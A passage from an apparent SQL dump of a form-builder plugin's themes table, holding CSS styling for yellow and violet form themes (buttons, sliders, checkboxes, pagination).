1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\nfont-size: 13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}', 0),
(6, 'Theme 02 yellow', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #EADEB4;\r\nborder: 1px solid #E3E2E4;\r\nmargin-bottom: 10px;\r\ncolor: #E3E2E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #CFAB1A;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right  #A08104;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #CFAB1A;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left  #A08104;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E2DED7;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/02/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\nfloat:left;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #3F3927;\r\n	cursor: pointer;\r\n	background-color: #ECBD00;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #ECBD00 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #ECBD00 ), color-stop(49%, #F5C403 ), color-stop(84%, #F8C90B ), color-stop(99%, #FFCC00 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #D9D7D8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #292929;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(7, 'Theme 02 violet', 'v.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #C9ADEF;\r\nborder: 1px solid #E3E2E4;\r\nmargin-bottom: 10px;\r\ncolor: #E3E2E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 